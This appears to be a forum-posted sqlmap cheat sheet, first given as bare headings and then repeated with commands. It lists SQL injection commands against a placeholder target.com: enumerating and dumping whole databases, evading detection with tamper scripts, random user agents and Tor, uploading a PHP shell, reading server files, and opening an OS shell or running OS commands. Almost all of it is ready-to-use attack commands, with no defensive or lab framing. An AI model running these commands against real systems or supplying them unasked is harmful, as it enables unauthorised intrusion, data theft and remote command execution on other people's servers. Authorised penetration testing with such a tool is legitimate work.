I hope you find this useful.
Basic Usage
Find databases:
Exploit techniques:
B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries
Clear cache:
Evasion
Detection:
Level (1-5) : level of tests
Risk (1-3): risk of tests
Use tamper scripts for evasion:
Send a random user agent:
Data Extraction
Basic syntax:
Example options:
--tables : find tables
--columns : find columns
--current-user : find current user
--current-db : find database name
Send POST data:
List users and roles:
Dump a table:
Dump everything:
Set a dump limit:
List columns:
Upload a shell:
Download a file:
Advanced Usage
Target a specific parameter:
Inject at a specific URI position with *:
Example:
Authentication
NTLM/Basic:
Cookie:
Command Execution
OS shell:
SQL shell:
OS command:
SQL command:
Proxies
Tor:
HTTP:
Basic Usage
Find databases:
HTML:
sqlmap --dbms=mysql -u "http://target.com/" --dbsExploit techniques:
HTML:
--technique=BEUSTQB: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries
Clear cache:
HTML:
--fresh-queries
--flush-sessionEvasion
Detection:
HTML:
--level=5
--risk=3Level (1-5) : level of tests
Risk (1-3): risk of tests
Use tamper scripts for evasion:
HTML:
--tamper="random,randomcase,appendnullbyte,between,base64encode"Send a random user agent:
HTML:
--random-agentData Extraction
Basic syntax:
HTML:
sqlmap --dbms=mysql -u "http://target.com/" -D target_db (option)Example options:
--tables : find tables
--columns : find columns
--current-user : find current user
--current-db : find database name
Send POST data:
HTML:
sqlmap --dbms=mysql -u "http://target.com/" --data="data1=aaa&data2=bbb"List users and roles:
HTML:
sqlmap --dbms=mysql -u "http://target.com/" --users --roles --threads=5Dump a table:
HTML:
sqlmap --dbms=mysql -u "http://target.com/" -D target_db -T target_table --dumpDump everything:
HTML:
sqlmap --dbms=mysql -u "http://target.com/" -D target_db --dump-allSet a dump limit:
HTML:
--start=1 --stop=10List columns:
HTML:
sqlmap --dbms=mysql -u "http://target.com/" -D target_db -T target_table --columnsUpload a shell:
HTML:
sqlmap --dbms=mysql -u "http://target.com/" -D target_db --file-write="/path/to/your/shell.php"Download a file:
HTML:
sqlmap --dbms=mysql -u "http://target.com/" -D target_db --file-read=/path/to/target/fileAdvanced Usage
Target a specific parameter:
HTML:
sqlmap --dbms=mysql -u "http://target.com/param1=value1¶m2=value2" --dbs -p param2Inject at a specific URI position with *:
HTML:
sqlmap -u "http://target.com/abc/def/123*/data.php"Example:
HTML:
sqlmap --dbms=mysql -u "http://target.com/param1/value1*/param2/value2" --dbsAuthentication
NTLM/Basic:
HTML:
sqlmap -u "http://target.com/" -s-data=param1=value1¶m2=value2 -p param1 --auth-type=[basic/ntlm] --auth-cred=username:passwordCookie:
HTML:
sqlmap -u "http://target.com/" --data="param1=blah¶m2=blah" --cookie="JSESSIONID=d01429cbe50e16aa4" --level=5 --risk=3 -p param1Command Execution
OS shell:
HTML:
sqlmap --dbms=mysql -u "http://target.com/" --os-shellSQL shell:
HTML:
sqlmap --dbms=mysql -u "http://target.com/" --sql-shellOS command:
HTML:
sqlmap --dbms=mysql -u "http://target.com/" --os-cmd whoamiSQL command:
HTML:
sqlmap --dbms=mysql -u "http://target.com/" -D target_db --sql-query "SELECT * FROM TABLE;"Proxies
Tor:
HTML:
sqlmap -u "http://target.com/" --tor --tor-type=SOCKS5 --check-torHTTP:
HTML:
sqlmap -u "http://target.com/" --proxy=http://proxy_address:port